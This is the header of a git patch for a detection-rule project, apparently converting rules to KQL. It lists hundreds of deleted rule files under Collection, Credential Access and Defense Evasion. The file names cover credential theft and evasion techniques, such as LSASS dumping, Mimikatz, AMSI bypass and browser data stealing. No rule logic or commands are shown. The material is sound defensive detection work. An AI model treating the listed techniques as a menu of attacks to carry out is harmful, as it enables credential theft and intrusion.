From 9b6c4799fec5f908de82e8f2c826b8e18174c255 Mon Sep 17 00:00:00 2001 From: Kaiber_wsl_desktop Date: Sat, 15 Nov 2025 17:38:36 +1100 Subject: [PATCH 01/17] Added various items to the project to improve it. A more robust Python script for conversions with better error handling, utilising the newest KQL backend, requirements.txt. and much better documentation. --- Collection/7Zip_Compressing_Dump_Files.kql | 7 - Collection/Audio_Capture_via_PowerShell.kql | 7 - .../Audio_Capture_via_SoundRecorder.kql | 7 - .../Automated_Collection_Command_Prompt.kql | 7 - ...h_Password_for_Exfiltration_With_7-ZIP.kql | 7 - ..._Password_for_Exfiltration_With_WINZIP.kql | 7 - .../Compressed_File_Creation_Via_Tar.EXE.kql | 9 - ...Compressed_File_Extraction_Via_Tar.EXE.kql | 9 - ...rom_Or_To_Admin_Share_Or_Sysvol_Folder.kql | 7 - .../CredUI.DLL_Loaded_By_Uncommon_Process.kql | 7 - .../Data_Copied_To_Clipboard_Via_Clip.EXE.kql | 7 - .../Esentutl_Steals_Browser_Information.kql | 7 - .../Exchange_PowerShell_Snap-Ins_Usage.kql | 7 - ...iles_Added_To_An_Archive_Using_Rar.EXE.kql | 7 - ...ous_Output_Via_Compress-Archive_Cmdlet.kql | 9 - Collection/PUA_-_Mouse_Lock_Execution.kql | 7 - ...ed_Compressed_File_Extraction_Via_7Zip.kql | 7 - ...owerShell_Get-Clipboard_Cmdlet_Via_CLI.kql | 7 - ...ge_with_Password_and_Compression_Level.kql | 7 - ...rmation_for_Export_with_Command_Prompt.kql | 7 - ...Remote_Utilities_RAT_(RURAT)_Execution.kql | 7 - ...SQLite_Chromium_Profile_Data_DB_Access.kql | 7 - .../SQLite_Firefox_Profile_Data_DB_Access.kql | 7 - .../Screen_Capture_Activity_Via_Psr.EXE.kql | 7 - ...uspicious_Camera_and_Microphone_Access.kql | 7 - ...lation_Of_Default_Accounts_Via_Net.EXE.kql | 7 - ...tabase_Credentials_Dump_Via_Sqlcmd.EXE.kql | 7 - ...Veeam_Backup_Database_Suspicious_Query.kql | 7 - ..._-_DisableAIDataAnalysis_Value_Deleted.kql | 10 - ...dows_Recall_Feature_Enabled_-_Registry.kql | 10 - ...ows_Recall_Feature_Enabled_Via_Reg.EXE.kql | 11 - Collection/Winrar_Compressing_Dump_Files.kql | 7 - ...inrar_Execution_in_Non-Standard_Folder.kql | 7 - ...l_Cmdlets_Execution_-_ProccessCreation.kql | 7 - ...edential_Files_By_Uncommon_Application.kql | 10 - ...e_Sysvol_Files_By_Uncommon_Application.kql | 7 - ...l_History_File_By_Uncommon_Application.kql | 9 - ...PI_Master_Keys_By_Uncommon_Application.kql | 9 - ...ctory_Database_Snapshot_Via_ADExplorer.kql | 7 - .../Automated_Collection_Command_Prompt.kql | 7 - .../Browser_Started_with_Remote_Debugging.kql | 7 - .../Capture_Credentials_with_Rpcping.exe.kql | 7 - .../Certificate_Exported_Via_PowerShell.kql | 7 - ...g_Sensitive_Files_with_Credential_Data.kql | 7 - .../CrackMapExec_File_Indicators.kql | 7 - .../CredUI.DLL_Loaded_By_Uncommon_Process.kql | 7 - .../Cred_Dump_Tools_Dropped_Files.kql | 7 - ...Manager_Access_By_Uncommon_Application.kql | 9 - .../Dropping_Of_Password_Filter_DLL.kql | 7 - .../Dumping_Process_via_Sqldumper.exe.kql | 7 - ...Dumping_of_Sensitive_Hives_Via_Reg.EXE.kql | 7 - ...umeration_for_3rd_Party_Creds_From_CLI.kql | 7 - ...numeration_for_Credentials_in_Registry.kql | 10 - .../Esentutl_Gather_Credentials.kql | 7 - ...entutl_Volume_Shadow_Copy_Service_Keys.kql | 7 - Credential Access/Findstr_GPP_Passwords.kql | 7 - .../HackTool_-_ADCSPwn_Execution.kql | 7 - .../HackTool_-_Certify_Execution.kql | 7 - .../HackTool_-_Certipy_Execution.kql | 7 - .../HackTool_-_CrackMapExec_Execution.kql | 7 - ...ckTool_-_CrackMapExec_Process_Patterns.kql | 7 - ..._-_Dumpert_Process_Dumper_Default_File.kql | 7 - ...l_-_Hashcat_Password_Cracker_Execution.kql | 7 - ..._-_Hydra_Password_Bruteforce_Execution.kql | 7 - .../HackTool_-_Inveigh_Execution.kql | 7 - .../HackTool_-_KrbRelayUp_Execution.kql | 7 - .../HackTool_-_KrbRelay_Execution.kql | 7 - .../HackTool_-_Mimikatz_Execution.kql | 7 - ..._Pypykatz_Credentials_Dumping_Activity.kql | 7 - .../HackTool_-_Quarks_PwDump_Execution.kql | 7 - .../HackTool_-_Rubeus_Execution.kql | 7 - .../HackTool_-_SafetyKatz_Execution.kql | 7 - .../HackTool_-_SecurityXploded_Execution.kql | 7 - .../HackTool_-_WinPwn_Execution.kql | 8 - .../Hacktool_Execution_-_PE_Metadata.kql | 7 - ...ting_Of_Wifi_Credentials_Via_Netsh.EXE.kql | 7 - ...rectory_Diagnostic_Tool_(ntdsutil.exe).kql | 7 - .../LSASS_Dump_Keyword_In_CommandLine.kql | 8 - ...ess_Dump_Artefact_In_CrashDumps_Folder.kql | 7 - ...s_Memory_Dump_Creation_Via_Taskmgr.EXE.kql | 7 - .../LSASS_Process_Memory_Dump_Files.kql | 7 - ...Process_Reconnaissance_Via_Findstr.EXE.kql | 7 - ...Request_Via_DumpType_Registry_Settings.kql | 7 - ...soft_IIS_Connection_Strings_Decryption.kql | 7 - ...ft_IIS_Service_Account_Password_Dumped.kql | 7 - .../Mimikatz_Kirbi_File_Creation.kql | 7 - Credential Access/NPPSpy_Hacktool_Usage.kql | 7 - Credential Access/NTDS.DIT_Created.kql | 7 - ...IT_Creation_By_Uncommon_Parent_Process.kql | 7 - .../NTDS.DIT_Creation_By_Uncommon_Process.kql | 7 - .../NTDS_Exfiltration_Filename_Patterns.kql | 7 - ...neric_Credentials_Added_Via_Cmdkey.EXE.kql | 9 - ...rk_Trace_Capture_Started_Via_Netsh.EXE.kql | 7 - .../PUA_-_DIT_Snapshot_Viewer.kql | 7 - .../PUA_-_Mouse_Lock_Execution.kql | 7 - .../PUA_-_WebBrowserPassView_Execution.kql | 7 - ...uration_Reconnaissance_Via_Findstr.EXE.kql | 7 - Credential Access/PktMon.EXE_Execution.kql | 7 - .../Potential_Browser_Data_Stealing.kql | 10 - ...ttempt_Using_New_NetworkProvider_-_CLI.kql | 7 - ...ttempt_Using_New_NetworkProvider_-_REG.kql | 7 - ...ential_Dumping_Via_LSASS_Process_Clone.kql | 7 - ..._Via_LSASS_SilentProcessExit_Technique.kql | 7 - .../Potential_Credential_Dumping_Via_WER.kql | 7 - ...ealing_Via_Chromium_Headless_Debugging.kql | 7 - ...ential_LSASS_Process_Dump_Via_Procdump.kql | 9 - ..._Sniffing_Activity_Using_Network_Tools.kql | 10 - ..._For_Cached_Credentials_Via_Cmdkey.EXE.kql | 7 - ...ial_Remote_Credential_Dumping_Activity.kql | 7 - .../Potential_SAM_Database_Dump.kql | 7 - ...tential_SPN_Enumeration_Via_Setspn.EXE.kql | 7 - ...tial_Suspicious_Activity_Using_SeCEdit.kql | 7 - ...indows_Defender_Tampering_Via_Wmic.EXE.kql | 7 - ...ommand_Targeting_Teams_Sensitive_Files.kql | 9 - ...con_Activity_Using_Log_Query_Utilities.kql | 9 - .../PowerShell_Get-Process_LSASS.kql | 7 - Credential Access/PowerShell_SAM_Copy.kql | 7 - ...s_Reconnaissance_Via_CommandLine_Tools.kql | 7 - ...ss_Access_via_TrolleyExpress_Exclusion.kql | 7 - .../Process_Memory_Dump_Via_Comsvcs.DLL.kql | 7 - ...rocess_Memory_Dump_via_RdrLeakDiag.EXE.kql | 7 - Credential Access/QuarksPwDump_Dump_File.kql | 7 - ...SQLite_Chromium_Profile_Data_DB_Access.kql | 7 - .../SQLite_Firefox_Profile_Data_DB_Access.kql | 7 - .../SafetyKatz_Default_Dump_Filename.kql | 7 - .../Sensitive_File_Dump_Via_Wbadmin.EXE.kql | 9 - ...e_Recovery_From_Backup_Via_Wbadmin.EXE.kql | 9 - ...tion_Using_Operating_Systems_Utilities.kql | 7 - ...ctory_Database_Snapshot_Via_ADExplorer.kql | 7 - .../Suspicious_Dump64.exe_Execution.kql | 7 - ...spicious_File_Event_With_Teams_Objects.kql | 7 - .../Suspicious_Key_Manager_Access.kql | 7 - ...ication_on_the_Printer_Spooler_Service.kql | 7 - ...Suspicious_Office_Token_Search_Via_CLI.kql | 7 - .../Suspicious_PFX_File_Creation.kql | 7 - ...icious_Process_Patterns_NTDS.DIT_Exfil.kql | 7 - .../Suspicious_Reg_Add_Open_Command.kql | 7 - ...uspicious_SYSTEM_User_Process_Creation.kql | 7 - ...ious_SYSVOL_Domain_Group_Policy_Access.kql | 7 - .../Suspicious_Serv-U_Process_Pattern.kql | 7 - .../Suspicious_Unattend.xml_File_Access.kql | 9 - ...rectory_Diagnostic_Tool_(ntdsutil.exe).kql | 7 - .../Time_Travel_Debugging_Utility_Usage.kql | 7 - ...Travel_Debugging_Utility_Usage_-_Image.kql | 7 - .../Typical_HiveNightmare_SAM_File_Export.kql | 7 - .../Uncommon_Outbound_Kerberos_Connection.kql | 8 - ...ShadowCopy_Symlink_Creation_Via_Mklink.kql | 7 - .../WerFault_LSASS_Process_Memory_Dump.kql | 7 - .../Windows_Credential_Editor_Registry.kql | 7 - ...Credential_Manager_Access_via_VaultCmd.kql | 7 - ...tifier_Deleted_By_Uncommon_Application.kql | 7 - ...sions_to_Hide_Services_Via_Set-Service.kql | 7 - Defense Evasion/Abusing_Print_Executable.kql | 7 - ...ook_Mail_Files_By_Uncommon_Application.kql | 10 - ..._Windows_Security_Center_Notifications.kql | 7 - .../Add_DisallowRun_Execution_to_Registry.kql | 7 - ...Add_Insecure_Download_Source_To_Winget.kql | 9 - .../Add_New_Download_Source_To_Winget.kql | 7 - ...spicious_New_Download_Source_To_Winget.kql | 7 - .../Add_SafeBoot_Keys_Via_Reg_Utility.kql | 7 - ....EXE_Execution_From_Uncommon_Directory.kql | 7 - .../AgentExecutor_PowerShell_Execution.kql | 7 - .../Allow_RDP_Remote_Assistance_Feature.kql | 7 - .../Amsi.DLL_Loaded_Via_LOLBIN_Process.kql | 7 - ...tion_Whitelisting_Bypass_via_Dxcap.exe.kql | 7 - .../Arbitrary_Command_Execution_Using_WSL.kql | 7 - ...r_Csproj_Code_Execution_Via_Dotnet.EXE.kql | 7 - ...bitrary_File_Download_Via_IMEWDBLD.EXE.kql | 7 - ...ary_File_Download_Via_MSEDGE_PROXY.EXE.kql | 7 - ...bitrary_File_Download_Via_MSOHTMED.EXE.kql | 7 - .../Arbitrary_File_Download_Via_MSPUB.EXE.kql | 7 - ...File_Download_Via_PresentationHost.EXE.kql | 7 - ...bitrary_File_Download_Via_Squirrel.EXE.kql | 8 - ...Arbitrary_MSI_Download_Via_Devinit.EXE.kql | 7 - Defense Evasion/AspNetCompiler_Execution.kql | 7 - ...sembly_Loading_Via_CL_LoadAssembly.ps1.kql | 7 - Defense Evasion/Atbroker_Registry_Change.kql | 7 - .../Audit_Policy_Tampering_Via_Auditpol.kql | 9 - ...Tampering_Via_NT_Resource_Kit_Auditpol.kql | 9 - ...cial_Processes_With_Improper_Arguments.kql | 10 - ...64_Encoded_PowerShell_Command_Detected.kql | 7 - ...y_Proxy_Execution_Via_Dotnet-Trace.EXE.kql | 7 - .../Blackbyte_Ransomware_Registry.kql | 7 - .../Bypass_UAC_Using_DelegateExecute.kql | 7 - .../Bypass_UAC_Using_SilentCleanup_Task.kql | 10 - Defense Evasion/Bypass_UAC_via_CMSTP.kql | 7 - .../Bypass_UAC_via_WSReset.exe.kql | 7 - .../C#_IL_Code_Compilation_Via_Ilasm.EXE.kql | 7 - .../CMSTP_Execution_Process_Creation.kql | 7 - .../CMSTP_Execution_Registry_Event.kql | 7 - ...CMSTP_UAC_Bypass_via_COM_Object_Access.kql | 7 - .../COM_Object_Execution_via_Xwizard.EXE.kql | 9 - .../Certificate_Exported_Via_Certutil.EXE.kql | 7 - ...ccount_Associated_with_the_FAX_Service.kql | 7 - ...Channel_Access_Permission_Via_Registry.kql | 7 - Defense Evasion/Change_the_Fax_Dll.kql | 7 - .../ClickOnce_Trust_Prompt_Tampering.kql | 7 - .../CobaltStrike_Load_by_Rundll32.kql | 7 - ...ation_Via_MODE.COM_To_Russian_Language.kql | 9 - .../Code_Execution_via_Pcwutl.dll.kql | 7 - Defense Evasion/Control_Panel_Items.kql | 7 - ...ureString_Cmdlet_Usage_Via_CommandLine.kql | 7 - Defense Evasion/CreateDump_Process_Dump.kql | 7 - ...Created_Files_by_Microsoft_Sync_Center.kql | 7 - .../Creation_Of_Non-Existent_System_DLL.kql | 9 - ...n_of_an_WerFault.exe_in_Unusual_Folder.kql | 7 - ...ion_Form_Potentially_Suspicious_Parent.kql | 7 - .../Curl_Download_And_Execute_Combination.kql | 7 - ..._File_Open_Handler_Executes_PowerShell.kql | 7 - .../DHCP_Callout_DLL_Installation.kql | 7 - ...Execution_Via_Register-cimprovider.exe.kql | 7 - .../DLL_Execution_via_Rasautou.exe.kql | 7 - ...stem_Process_From_Suspicious_Locations.kql | 7 - ...From_Suspicious_Location_Via_Cmspt.EXE.kql | 7 - Defense Evasion/DLL_Loaded_via_CertOC.EXE.kql | 7 - ..._Hijackig_Via_Additional_Space_in_Path.kql | 9 - .../DLL_Sideloading_Of_ShellChromeAPI.DLL.kql | 9 - ...DLL_Sideloading_by_VMware_Xfer_Utility.kql | 7 - .../DNS-over-HTTPS_Enabled_by_Registry.kql | 10 - ...Driver_Installation_OR_Starting_Of_VMs.kql | 7 - ..._of_PowerShell_Execution_via_Sqlps.exe.kql | 9 - .../DeviceCredentialDeployment_Execution.kql | 7 - ...launcher.exe_Executes_Specified_Binary.kql | 7 - ...ibrary_Sdiageng.DLL_Loaded_By_Msdt.EXE.kql | 7 - .../Directory_Removal_Via_Rmdir.kql | 11 - ...ministrative_Share_Creation_at_Startup.kql | 7 - ...Network_Protection_on_Windows_Defender.kql | 7 - ..._Internal_Tools_or_Feature_in_Registry.kql | 7 - .../Disable_Macro_Runtime_Scan_Scope.kql | 7 - ...crosoft_Defender_Firewall_via_Registry.kql | 7 - ...ble_PUA_Protection_on_Windows_Defender.kql | 7 - ...rivacy_Settings_Experience_in_Registry.kql | 7 - ..._Tamper_Protection_on_Windows_Defender.kql | 7 - ...indows_Defender_AV_Security_Monitoring.kql | 7 - ...nder_Functionalities_Via_Registry_Keys.kql | 7 - ...ble_Windows_Event_Logging_Via_Registry.kql | 7 - .../Disable_Windows_Firewall_by_Registry.kql | 7 - .../Disable_Windows_IIS_HTTP_Logging.kql | 7 - ..._Windows_Security_Center_Notifications.kql | 7 - Defense Evasion/Disable_of_ETW_Trace.kql | 7 - .../Disabled_IE_Security_Features.kql | 7 - Defense Evasion/Disabled_Volume_Snapshots.kql | 7 - .../Disabled_Windows_Defender_Eventlog.kql | 7 - ...ion_From_Potential_Suspicious_Location.kql | 7 - ..._-_Uncommon_Script_Extension_Execution.kql | 9 - .../Dism_Remove_Online_Package.kql | 7 - ...splaying_Hidden_Files_Feature_Disabled.kql | 9 - ...erServer_Function_Call_Via_Msiexec.EXE.kql | 7 - .../Dllhost.EXE_Execution_Anomaly.kql | 7 - ...ork_Connection_To_Non-Local_IP_Address.kql | 10 - ...naries_Into_Spool_Drivers_Color_Folder.kql | 7 - Defense Evasion/DumpMinitool_Execution.kql | 7 - .../DumpStack.log_Defender_Evasion.kql | 7 - .../Dynamic_.NET_Compilation_Via_Csc.EXE.kql | 7 - .../Dynamic_CSharp_Compile_Artefact.kql | 10 - .../ETW_Logging_Disabled_For_SCM.kql | 7 - .../ETW_Logging_Disabled_For_rpcrt4.dll.kql | 7 - .../ETW_Logging_Tamper_In_.NET_Processes.kql | 7 - .../EVTX_Created_In_Uncommon_Location.kql | 10 - Defense Evasion/Enable_LM_Hash_Storage.kql | 9 - .../Enable_LM_Hash_Storage_-_ProcCreation.kql | 9 - ...ocal_Manifest_Installation_With_Winget.kql | 7 - ...mous_Computer_-_AllowAnonymousCallback.kql | 7 - ...ing_COR_Profiler_Environment_Variables.kql | 7 - .../EventLog_EVTX_File_Deleted.kql | 7 - ...ange_PowerShell_Cmdlet_History_Deleted.kql | 7 - .../Execute_Code_with_Pester.bat.kql | 7 - ...Execute_Code_with_Pester.bat_as_Parent.kql | 7 - .../Execute_Files_with_Msdeploy.exe.kql | 7 - .../Execute_From_Alternate_Data_Streams.kql | 7 - .../Execute_MSDT_Via_Answer_File.kql | 7 - ...Execute_Pcwrun.EXE_To_Leverage_Follina.kql | 7 - .../Execution_DLL_of_Choice_Using_WAB.EXE.kql | 7 - .../Execution_Of_Non-Existing_File.kql | 7 - .../Execution_from_Suspicious_Folder.kql | 7 - ...tion_of_Suspicious_File_Type_Extension.kql | 9 - .../Execution_via_WorkFolders.exe.kql | 7 - .../Execution_via_stordiag.exe.kql | 7 - Defense Evasion/Explorer_NOUACCHECK_Flag.kql | 7 - .../Explorer_Process_Tree_Break.kql | 9 - .../Fax_Service_DLL_Search_Order_Hijack.kql | 7 - .../File_Deleted_Via_Sysinternals_SDelete.kql | 7 - Defense Evasion/File_Deletion_Via_Del.kql | 11 - ...ile_Download_Using_ProtocolHandler.exe.kql | 8 - .../File_Download_Via_Bitsadmin.kql | 7 - ...itsadmin_To_A_Suspicious_Target_Folder.kql | 7 - ...Bitsadmin_To_An_Uncommon_Target_Folder.kql | 7 - .../File_Download_Via_InstallUtil.EXE.kql | 8 - ...load_Via_Windows_Defender_MpCmpRun.EXE.kql | 7 - ...ile_Encoded_To_Base64_Via_Certutil.EXE.kql | 7 - ...ion_Encoded_To_Base64_Via_Certutil.EXE.kql | 7 - ...ous_Extension_Downloaded_Via_Bitsadmin.kql | 7 - ..._Process_Name_In_Unsuspected_Locations.kql | 9 - .../Filter_Driver_Unloaded_Via_Fltmc.EXE.kql | 7 - .../Findstr_Launching_.lnk_File.kql | 7 - .../Firewall_Disabled_via_Netsh.EXE.kql | 7 - .../Firewall_Rule_Deleted_Via_Netsh.EXE.kql | 7 - .../Firewall_Rule_Update_Via_Netsh.EXE.kql | 7 - ...Guard_ProtectedFolders_List_-_Registry.kql | 7 - ...orfiles.EXE_Child_Process_Masquerading.kql | 8 - .../Fsutil_Suspicious_Invocation.kql | 9 - Defense Evasion/Gpscript_Execution.kql | 7 - .../Greedy_File_Deletion_Using_Del.kql | 7 - Defense Evasion/HH.EXE_Execution.kql | 7 - ...L_Help_HH.EXE_Suspicious_Child_Process.kql | 7 - ...ackTool_-_Covenant_PowerShell_Launcher.kql | 7 - ..._-_CrackMapExec_PowerShell_Obfuscation.kql | 7 - ..._DInjector_PowerShell_Cradle_Execution.kql | 7 - .../HackTool_-_EDRSilencer_Execution.kql | 8 - ...ackTool_-_Empire_PowerShell_UAC_Bypass.kql | 7 - ...ackTool_-_F-Secure_C3_Load_by_Rundll32.kql | 7 - ...Rootkit_Detector_and_Remover_Execution.kql | 7 - .../HackTool_-_PowerTool_Execution.kql | 7 - ...-_RedMimicry_Winnti_Playbook_Execution.kql | 7 - .../HackTool_-_SharpEvtMute_Execution.kql | 7 - ...ackTool_-_SharpImpersonation_Execution.kql | 7 - .../HackTool_-_Stracciatella_Execution.kql | 7 - .../HackTool_-_WinPwn_Execution.kql | 8 - ...l_-_Wmiexec_Default_Powershell_Command.kql | 7 - .../HackTool_-_XORDump_Execution.kql | 7 - ...e_Schedule_Task_Via_Index_Value_Tamper.kql | 9 - .../Hiding_Files_with_Attrib.exe.kql | 7 - ...count_Via_SpecialAccounts_Registry_Key.kql | 7 - ...visor_Enforced_Code_Integrity_Disabled.kql | 7 - ..._To_MyComputer_Zone_For_HTTP_Protocols.kql | 8 - ...mputer_Zone_For_HTTP_Protocols_Via_CLI.kql | 8 - .../IIS_WebServer_Access_Logs_Deleted.kql | 7 - ...Interchange_Format_File_Via_Ldifde.EXE.kql | 8 - .../Imports_Registry_Key_From_a_File.kql | 7 - .../Imports_Registry_Key_From_an_ADS.kql | 7 - ...cution_By_Program_Compatibility_Wizard.kql | 7 - ...xecution_From_Script_File_Via_Bash.EXE.kql | 9 - ..._Inline_Command_Execution_Via_Bash.EXE.kql | 9 - .../InfDefaultInstall.exe_.inf_Execution.kql | 7 - ...itive_Subfolder_Search_Via_Findstr.EXE.kql | 8 - ..._New_Package_Via_Winget_Local_Manifest.kql | 10 - ...lorer_DisableFirstRunCustomize_Enabled.kql | 8 - .../Invoke-Obfuscation_CLIP+_Launcher.kql | 7 - ...nvoke-Obfuscation_COMPRESS_OBFUSCATION.kql | 7 - ...-Obfuscation_Obfuscated_IEX_Invocation.kql | 7 - .../Invoke-Obfuscation_STDIN+_Launcher.kql | 7 - ...Obfuscation_VAR++_LAUNCHER_OBFUSCATION.kql | 7 - .../Invoke-Obfuscation_VAR+_Launcher.kql | 7 - .../Invoke-Obfuscation_Via_Stdin.kql | 7 - .../Invoke-Obfuscation_Via_Use_Clip.kql | 7 - .../Invoke-Obfuscation_Via_Use_MSHTA.kql | 7 - .../JScript_Compiler_Execution.kql | 9 - ...Kavremover_Dropped_Binary_LOLBIN_Usage.kql | 7 - .../Kernel_Memory_Dump_Via_LiveKD.kql | 7 - ...OL-Binary_Copied_From_System_Directory.kql | 8 - ...SA_PPL_Protection_Disabled_Via_Reg.EXE.kql | 7 - .../Launch-VsDevShell.PS1_Proxy_Execution.kql | 7 - ...Legitimate_Application_Dropped_Archive.kql | 7 - ...itimate_Application_Dropped_Executable.kql | 7 - .../Legitimate_Application_Dropped_Script.kql | 7 - Defense Evasion/LiveKD_Driver_Creation.kql | 7 - ...KD_Driver_Creation_By_Uncommon_Process.kql | 7 - ...LiveKD_Kernel_Memory_Dump_File_Created.kql | 7 - ...f_RstrtMgr.DLL_By_A_Suspicious_Process.kql | 10 - ...Of_RstrtMgr.DLL_By_An_Uncommon_Process.kql | 10 - .../Lolbin_Runexehelper_Use_As_Proxy.kql | 7 - .../Lolbin_Ssh.exe_Use_As_Proxy.kql | 7 - .../Lolbin_Unregmp2.exe_Use_As_Proxy.kql | 7 - .../MSHTA_Suspicious_Execution_01.kql | 7 - ...d_In_A_Potentially_Suspicious_Document.kql | 7 - ...ropped_in_the_Teams_or_OneDrive_Folder.kql | 9 - ...on_by_Microsoft_Visual_Studio_Debugger.kql | 10 - ...nents_File_Execution_by_TAEF_Detection.kql | 9 - ...inject_Inject_DLL_Into_Running_Process.kql | 7 - .../MaxMpxCt_Registry_Value_Changed.kql | 10 - .../Microsoft_Office_DLL_Sideload.kql | 7 - ...crosoft_Office_Protected_View_Disabled.kql | 7 - ..._Center_Suspicious_Network_Connections.kql | 7 - .../Microsoft_Workflow_Compiler_Execution.kql | 7 - .../Modification_of_IE_Registry_Settings.kql | 7 - .../Modify_Group_Policy_Settings.kql | 7 - .../Monitoring_For_Persistence_Via_BITS.kql | 11 - ...LL_RunHTMLApplication_Suspicious_Usage.kql | 8 - Defense Evasion/MsiExec_Web_Install.kql | 7 - .../Msiexec_Quiet_Installation.kql | 9 - Defense Evasion/Msxsl.EXE_Execution.kql | 9 - ...enAssemblyUsageLog_Registry_Key_Tamper.kql | 10 - .../NetNTLM_Downgrade_Attack_-_Registry.kql | 7 - ..._Policy_on_Microsoft_Defender_Firewall.kql | 7 - ..._Connection_Initiated_By_AddinUtil.EXE.kql | 9 - ...k_Connection_Initiated_By_Regsvr32.EXE.kql | 7 - ...k_Connection_Initiated_Via_Notepad.EXE.kql | 10 - ..._Custom_DB_Path_Registry_Configuration.kql | 7 - ...Custom_VBScript_Registry_Configuration.kql | 7 - ...ustom_WMI_Query_Registry_Configuration.kql | 7 - .../New_DLL_Registered_Via_Odbcconf.EXE.kql | 7 - ...New_DNS_ServerLevelPluginDll_Installed.kql | 7 - ...evelPluginDll_Installed_Via_Dnscmd.EXE.kql | 7 - .../New_File_Association_Using_Exefile.kql | 7 - .../New_Firewall_Rule_Added_Via_Netsh.EXE.kql | 7 - .../New_PortProxy_Registry_Entry_Added.kql | 7 - ...rt_Forwarding_Rule_Added_Via_Netsh.EXE.kql | 7 - .../New_Process_Created_Via_Taskmgr.EXE.kql | 7 - ..._Certificate_Installed_Via_CertMgr.EXE.kql | 9 - ...Certificate_Installed_Via_Certutil.EXE.kql | 9 - Defense Evasion/Node_Process_Executions.kql | 7 - ...-privileged_Usage_of_Reg_or_Powershell.kql | 7 - ...hell_Download_Cradle_-_ProcessCreation.kql | 7 - .../NtdllPipe_Like_Activity_Execution.kql | 7 - .../OceanLotus_Registry_Activity.kql | 7 - .../Odbcconf.EXE_Suspicious_DLL_Location.kql | 7 - .../Office_Macros_Warning_Disabled.kql | 7 - .../OilRig_APT_Registry_Persistence.kql | 7 - ...nt_File_Dropped_In_Suspicious_Location.kql | 7 - ...OpenWith.exe_Executes_Specified_Binary.kql | 7 - ...work_Connection_Initiated_By_Cmstp.EXE.kql | 9 - ...k_Connection_To_Public_IP_Via_Winlogon.kql | 7 - ...ntMailRules_Setting_Enabled_-_Registry.kql | 7 - ...olicyTest_Creation_By_Uncommon_Process.kql | 7 - .../PUA_-_AdvancedRun_Execution.kql | 7 - ...PUA_-_AdvancedRun_Suspicious_Execution.kql | 7 - Defense Evasion/PUA_-_CleanWipe_Execution.kql | 7 - .../PUA_-_DefenderCheck_Execution.kql | 7 - ...ential_PE_Metadata_Tamper_Using_Rcedit.kql | 7 - ...nt_in_Public_Folder_Suspicious_Process.kql | 7 - ...rd_Provided_In_Command_Line_Of_Net.EXE.kql | 7 - .../Persistence_Via_New_SIP_Provider.kql | 7 - Defense Evasion/Ping_Hex_IP.kql | 7 - ...scalation_via_Weak_Service_Permissions.kql | 7 - .../Potential_7za.DLL_Sideloading.kql | 7 - .../Potential_AMSI_Bypass_Using_NULL_Bits.kql | 7 - ...ential_AMSI_Bypass_Via_.NET_Reflection.kql | 7 - .../Potential_AMSI_COM_Server_Hijacking.kql | 7 - .../Potential_AVKkid.DLL_Sideloading.kql | 7 - .../Potential_Adplus.EXE_Abuse.kql | 7 - ...ial_Antivirus_Software_DLL_Sideloading.kql | 7 - ...cation_Whitelisting_Bypass_via_Dnx.EXE.kql | 9 - ..._Arbitrary_Code_Execution_Via_Node.EXE.kql | 7 - ...trary_Command_Execution_Using_Msdt.EXE.kql | 7 - ...rbitrary_Command_Execution_Via_FTP.EXE.kql | 7 - ...ntial_Arbitrary_DLL_Load_Using_Winword.kql | 7 - ...File_Download_Using_Office_Application.kql | 7 - ...Arbitrary_File_Download_Via_Cmdl32.EXE.kql | 10 - ...t_Manager_Settings_Associations_Tamper.kql | 7 - ...nt_Manager_Settings_Attachments_Tamper.kql | 7 - ...otential_AutoLogger_Sessions_Tampering.kql | 7 - .../Potential_Azure_Browser_SSO_Abuse.kql | 9 - ...inary_Impersonating_Sysinternals_Tools.kql | 7 - ...ial_Binary_Proxy_Execution_Via_Cdb.EXE.kql | 7 - ..._Proxy_Execution_Via_VSDiagnostics.EXE.kql | 7 - .../Potential_CCleanerDU.DLL_Sideloading.kql | 7 - ...al_CCleanerReactivator.DLL_Sideloading.kql | 7 - ...al_Chrome_Frame_Helper_DLL_Sideloading.kql | 7 - ...nd_Line_Path_Traversal_Evasion_Attempt.kql | 7 - ...ne_Obfuscation_Using_Escape_Characters.kql | 7 - ...e_Obfuscation_Using_Unicode_Characters.kql | 9 - ...jection_Or_Execution_Using_Tracker.exe.kql | 7 - ...tential_DLL_Sideloading_Of_DBGCORE.DLL.kql | 7 - ...tential_DLL_Sideloading_Of_DBGHELP.DLL.kql | 7 - ...Sideloading_Of_Libcurl.DLL_Via_GUP.EXE.kql | 7 - ...tial_DLL_Sideloading_Using_Coregen.exe.kql | 7 - ..._Sideloading_Via_ClassicExplorer32.dll.kql | 7 - ...DLL_Sideloading_Via_DeviceEnroller.EXE.kql | 9 - ...Potential_DLL_Sideloading_Via_JsSchHlp.kql | 7 - ...ential_DLL_Sideloading_Via_VMware_Xfer.kql | 7 - ...ntial_DLL_Sideloading_Via_comctl32.dll.kql | 7 - ...tial_Defense_Evasion_Via_Binary_Rename.kql | 7 - ...Via_Rename_Of_Highly_Relevant_Binaries.kql | 7 - ...nse_Evasion_Via_Right-to-Left_Override.kql | 9 - .../Potential_EACore.DLL_Sideloading.kql | 7 - .../Potential_Edputil.DLL_Sideloading.kql | 7 - ...ded_PowerShell_Patterns_In_CommandLine.kql | 7 - ...ntial_EventLog_File_Location_Tampering.kql | 7 - ...al_Fake_Instance_Of_Hxtsr.EXE_Executed.kql | 10 - ...d_Via_MS-AppInstaller_Protocol_Handler.kql | 9 - .../Potential_Goopdate.DLL_Sideloading.kql | 7 - ...ation_Via_NTFS_INDEX_ALLOCATION_Stream.kql | 8 - ...Via_NTFS_INDEX_ALLOCATION_Stream_-_CLI.kql | 8 - ...lyph_Attack_Using_Lookalike_Characters.kql | 10 - ...Using_Lookalike_Characters_in_Filename.kql | 10 - ..._Access_via_DLL_Search_Order_Hijacking.kql | 7 - .../Potential_Iviewers.DLL_Sideloading.kql | 7 - ...ential_LSASS_Process_Dump_Via_Procdump.kql | 9 - ...otential_LethalHTA_Technique_Execution.kql | 7 - .../Potential_Libvlc.DLL_Sideloading.kql | 7 - ...anage-bde.wsf_Abuse_To_Proxy_Execution.kql | 7 - ...ial_Memory_Dumping_Activity_Via_LiveKD.kql | 7 - .../Potential_Mfdetours.DLL_Sideloading.kql | 7 - .../Potential_Mftrace.EXE_Abuse.kql | 7 - .../Potential_Mpclient.DLL_Sideloading.kql | 7 - ....DLL_Sideloading_Via_Defender_Binaries.kql | 7 - .../Potential_MsiExec_Masquerading.kql | 7 - ...tential_NTLM_Coercion_Via_Certutil.EXE.kql | 7 - ...ential_NetWire_RAT_Activity_-_Registry.kql | 7 - ...l_Obfuscated_Ordinal_Call_Via_Rundll32.kql | 7 - 